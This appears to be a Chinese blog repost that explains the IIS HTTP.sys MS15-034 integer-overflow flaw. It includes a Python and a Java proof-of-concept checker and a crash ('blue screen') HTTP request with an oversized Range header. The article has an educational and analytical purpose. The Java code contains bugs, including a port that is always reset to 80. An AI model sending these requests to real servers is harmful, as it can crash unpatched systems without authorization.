微软 IIS HTTP.sys漏洞原理学习以及POC

最新推荐文章于 2024-05-13 10:24:58 发布
最新推荐文章于 2024-05-13 10:24:58 发布
阅读量491 收藏
点赞数
文章标签: java
原文链接:http://www.cnblogs.com/KevinGeorge/p/8074694.html
版权

零、MS15-034POC核心部分(参考巡风):

1 socket.setdefaulttimeout(timeout)
2 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
3 s.connect((ip, int(port)))
4 flag = "GET / HTTP/1.0\r\nHost: stuff\r\nRange: bytes=0-18446744073709551615\r\n\r\n"
5 s.send(flag)
6 data = s.recv(1024)
7 s.close()
8 if 'Requested Range Not Satisfiable' in data and 'Server: Microsoft' in data:
9     print "vuln"

由于最近想学习java,所以修改了一版java的代码:

 1 /*
 2  * encoding:utf-8
 3  * Author:chenran01;
 4  * Email:crsecscu@gmail.com
 5 */
 6 
 7 //import lib packages
 8 import java.net.Socket;
 9 import java.util.Scanner;
10 import java.io.*;
11 
12 //define main class
13 public class HTTPSYS{
14     public static String IP_ADDR = "127.0.0.1";
15     public static int PORT = 80;
16     public static String Flag = "GET / HTTP/1.0\r\nHost: stuff\r\nRange: bytes=0-18446744073709551615\r\n\r\n";
17     //Flag is the payload
18     public static void main(String[] args){
19         System.out.print("Please input target IP:");
20         Scanner input = new Scanner(System.in);
21         IP_ADDR = input.next();
22         System.out.print("Please input target port:");
23         try{
24             PORT = System.in.read();
25         }catch(Exception ex){
26             System.out.printf("Error-Reason:%s",ex.toString());
27         }finally{
28             PORT = 80;
29         }
30         try{
31             Socket socket = new Socket(IP_ADDR,PORT);
32             //创建socket
33             DataInputStream socketrecv = new DataInputStream(socket.getInputStream());    
34             DataOutputStream socketsend = new DataOutputStream(socket.getOutputStream());
35             //创建输入输出对象
36             socketsend.writeUTF(Flag);//发送payload
37             String response_content = socketrecv.readUTF();//获取回显
38             if(response_content.indexOf("Server: Microsoft") != -1 && response_content.indexOf("Requested Range Not Satisfiable") != -1){
39                 System.out.print("有漏洞");
40             }else{
41                 System.out.print("没有漏洞");
42             }
43         }catch(Exception ex){
44             System.out.printf("Error-Reason:%s",ex.toString());
45         }
46         
47         
48     }
49 }

 

一、MS15-034 HTTP.sys漏洞原理考证:

原理部分参考:http://www.ijiandao.com/safe/cto/12821.html

1 #举例:蓝屏POC
2 """
3 GET /welcome.png HTTP/1.1
4 Host: PoC
5 Range: bytes=12345-18446744073709551615
6 """

这个地方的Range字段在IIS内部HTTP!UlBuildFastRangeCacheMdlChain(用于生成响应报文的缓存MDL链,来描述HTTP响应的状态行、头部与消息体。)这个函数中会调用一次nt! IoBuildPartialMdl函数来生成MDL链。这这个函数里,会计算length这个值:

 

 注意这里明确要求了由VirtualAddress与Length确定的区间必须是SourceMdl描述的缓冲区的一个自区间,正是对此要求的违反导致了此漏洞中的内存破坏。

第3次调用nt! IoBuildPartialMdl来生成消息体MDL时的参数如下:

图片6

SourceMdl = 0xfffffa801a38cb60
SourceMdl.VirtualAddress = 0xfffffa801ac94000
SourceMdl.ByteCount = 0x2d315
SourceMdl.ByteOffset = 0x0
TargetMdl = 0xfffffa801a2ed580
TargetMdl.VirtualAddress = 0xfffffa801ac97000
TargetMdl.ByteCount = 0xffffcfc7
TargetMdl.ByteOffset = 0x39
VirtualAddress = 0xfffffa801ac97039
Length = 0xffffcfc7

这里的Length是根据HTTP请求消息头部中的Range字段计算得到的,过程如下:

首先,在HTTP!UlpParseRange中对Range字段进行解析,得到RangeBegin、RangeEnd;
然后,计算RangeLength = RangeEnd – RangeBegin + 1;
最后,将RangeLength截断为32位得到Length。
以PoC中的Range: bytes=12345-18446744073709551615为例:
RangeBegin = 12345 = 0x3039
RangeEnd = 18446744073709551615 = 0xffffffffffffffff
RangeLength = 0xffffffffffffffff – 0x00003039 + 1 = 0xffffffffffffcfc7
Length = 0xffffcfc7
显然由于Length超长而导致违反了nt! IoBuildPartialMdl的要求,进而造成内存破坏。

转载于:https://www.cnblogs.com/KevinGeorge/p/8074694.html

weixin_30909575
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
MS15-034 HTTP.sys 远程执行代码(CVE-2015-1635)POC
03-19
远程执行代码漏洞存在于 HTTP 协议堆栈 (HTTP.sys) 中,当 HTTP.sys 未正确分析经特殊设计的 HTTP 请求时会导致此漏洞。 成功利用此漏洞的攻击者可以在系统帐户的上下文中执行任意代码。
ms15-034漏洞影响linux,MS15-034:Microsoft Windows HTTP.sys 远程执行代码漏洞POC
weixin_39654352的博客
05-18 177
#!/usr/bin/pythonimport requestsimport sysurl = "http://"+sys.argv[1]r = requests.get(url)remote_server = r.headers['Server']if remote_server.find("IIS/7.5") or remote_server.find("IIS/8.0"):payload =...
HTTP.sys远程执行代码漏洞(CVE-2015-1635,MS15-034
Fly_鹏程万里
05-05 8725
前言 在2015年4月的补丁日,微软通过标记为“高危”的MS15-034补丁,修复了HTTP.SYS中一处远程代码漏洞CVE-2015-1635。据微软公告(https://technet.microsoft.com/en-us/library/security/MS15-034)所称,当存在该漏洞HTTP服务器接收到精心构造的HTTP请求时,可能触发远程代码在目标系统以系统权限执行。 影响...
Windows/Mailing
最新发布
ve9etable的博客
05-13 875
使用 nmap 扫描系统,发现对外开放了如下端口80 端口运行着 iis 服务,老规矩,将 mailing.htb 添加到 /etc/hosts 中。
HTTP中的Range: bytes=0-
lotluck的专栏
11-09 1万+
HTTP中的Range就是分段请求字节数,也是大家经常说的断点续传。Range头域可以请求实体的一个或者多个子范围,Range的值为0表示第一个字节,也就是Range计算字节数是从0开始的表示第二个500字节:bytes=500-999 表示最后500个字节:bytes=-500 表示500字节以后的范围:bytes=500- 第一个和最后一个字节:bytes=0-0,-1 同时指定几个范围:byt
http.sys远程代码执行漏洞MS15-034
weixin_34307464的博客
08-06 772
0x01漏洞描述 远程执行代码漏洞存在于 HTTP 协议堆栈 (HTTP.sys) 中,当 HTTP.sys 未正确分析经特殊设计的 HTTP 请求时会导致此漏洞。成功利用此漏洞的攻击者可以在系统帐户的上下文中执行任意代码。若要利用此漏洞,攻击者必须将经特殊设计的 HTTP 请求发送到受影响的系统。 通过修改 Windows HTTP 堆栈处理请求的方式,安装更新可以修复此漏洞。 0x0...
IIS7 HTTP.sys远程代码执行漏洞
weixin_33819479的博客
12-01 1500
POC:GET /welcome.png HTTP/1.1Host: www.test.comRange: bytes=0-18446744073709551615显示结果若是包含以下结果证明漏洞存在: Requested Range Not Satisfiable 转载于:https://blog.51cto.com/zhpfbk/1878418...
2021.4.8 护网 0day漏洞 POC漏洞示例
04-08
亲测真实有效,如有侵权请联系CSDN管理员删除即可
POC.rar_POC_VHDL poc设计
09-20
用VHDL语言设计的poc (并行输出控制器) 用法:中断模式 和 查询模式
POC.rar_As One_POC
09-20
POC is one of the most common I/O modules, namely the parallel output controller. It plays the role of an interface between the computer system bus and the peripheral (such as a printer or other ...
最新通达漏洞各版本利用poc.rar
03-31
最新通达漏洞各版本利用poc
xp正版验证补丁_实操web漏洞验证——IIS HTTP.sys 整数溢出漏洞
weixin_39608457的博客
11-21 568
一、漏洞描述Http.sys 是一个位于 Windows 操作系统核心组件,能够让任何应用程序通过它提供的接口,以 Http 协议进行信息通讯。微软在 Windows 2003 Server 里引进了新的 HTTP API 和内核模式驱动 Http.sys,目的是使基于 Http 服务的程序更有效率。其实在 Windows XP 安装 SP2 后,Http.sys 已经出现在系统里了,但事实上操作...
iis常见漏洞(中间件常见漏洞
qq_56438857的博客
08-17 8883
漏洞的意义:1、 猜解后台地址2、 猜解敏感文件,例如备份的rar、zip、.bak、.sql文件等。3、 在某些情形下,甚至可以通过短文件名web直接下载对应的文件。该漏洞的局限性:1、 只能猜解前六位,以及扩展名的前三位。2、 名称较短的文件是没有相应的短文件名的。3、 不支持中文文件名4、 如果文件名前6位带空格,8.3格式的短文件名会补进,和真实文件名不匹配5、 需要IIS和.net两个条件都满足。...
IIS网站漏洞利用
m0_46559879的博客
04-19 2122
网站漏洞利用 网站后台绕过 1、猜测网站的后台管理地址或使用御剑孤独后台扫描工具暴力搜索进入后台登录界面。 2、尝试使用弱密码登录系统,观察登陆界面给出的反馈。 3、输入一些特殊字符,如‘’/±=等,点击登录,观察系统反馈。 4、根据登录界面给出的反馈构造永真的SQL语句绕过登录界面。 5、进入网站后台管理界面。 一般网站的后台地址为http://192.168.167.84<font color="blue">/admin 或/login</font> 一般网站默认用户名和密码为:
IIS 解析漏洞复现
来日可期的博客
10-12 3027
IIS 7.0/7.5 解析漏洞,在路径的末尾添加一个/.php,页面报错的原因是这里使用的是IIS10.0 该漏洞已被修复。php解释执行是通过php解释器来决定的,这里我们使用phpstudy中的php-cgi.exe。当用户访问phpinfo.php的时候,将该文件找到交给php-cgi.exe来解释执行。修改php.ini文件中的cgi.fix.pathinfo的值为0。将phpinfo.php后缀名修改为png,重新访问页面。在指定目录下创建一个phpinfo.php文件。
文件上传漏洞系列总结(三),持续更新。。。。
paidx0
01-26 3966
一、编辑器漏洞 编辑器属于第三方软件,它的作用是方便网站管理员上传或编辑网站上的内容, 类似我们电脑上的Word文档。 常用编辑器: FCKeditor EWEbeditor CKFinder UEDITOR DotNet TextBox Cute Editor 常见的两种编辑器是FCK和eWEB FCK编辑器漏洞利用 FCKeditor常见上传目录: FCKeditor/editor/filemanager/browser/default/connectors/test.html FCKeditor
漏洞复现之CVE-2015-1635-HTTP.SYS远程执行代码漏洞ms15-034
白帽子九一
04-19 3571
1.1.1 漏洞描述 在2015年4月安全补丁日,微软发布的众多安全更新中,修复了HTTP.sys中一处允许远程执行代码漏洞,编号为:CVE-2015-1635(MS15-034 )。利用HTTP.sys的安全漏洞,攻击者只需要发送恶意的http请求数据包,就可能远程读取IIS服务器的内存数据,或使服务器系统蓝屏崩溃。根据公告显示,该漏洞对服务器系统造成了不小的影响,主要影响了包括Windows 7、Windows Server 2008 R2、Windows 8、Windows Server 2012、
MS15-034测试方法
热门推荐
Jiajiajiang_的博客
06-20 1万+
Range: bytes=0-18446744073709551615 使用IIS作为WEB容器且使用版本存在编号为MS-15034的远程代码执行漏洞。利用该漏洞可轻易使服务器宕机蓝屏。发送测试代码,若返回“RequestedRangeNotSatisfiable”证明存在此漏洞。 关于IIS远程代码执行漏洞 针对该漏洞,建议根据官网升级对应漏洞版本补丁。 ...
MS15-034漏洞总结
hackerie的博客
09-04 1万+
在2015年4月安全补丁日,微软发布的众多安全更新中,修复了HTTP.sys中一处允许远程执行代码漏洞,编号为:CVE-2015-1635(MS15-034 )。利用HTTP.sys的安全漏洞,攻击者只需要发送恶意的http请求数据包,就可能远程读取IIS服务器的内存数据,或使服务器系统蓝屏崩溃。根据公告显示,该漏洞对服务器系统造成了不小的影响,主要影响了包括Windows 7、Windows ...
汉得 SRMtomcat.jsp 登录绕过漏洞 POC
09-01
很抱歉,我无法提供关于汉得 SRMtomcat.jsp登录绕过漏洞POC。我的回答只限于提供有关麦田怪圈的信息。如果你有其他关于麦田怪圈的问题,我会很乐意帮助你。<span class="em">1 #### 引用[.reference_title] - *1* ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值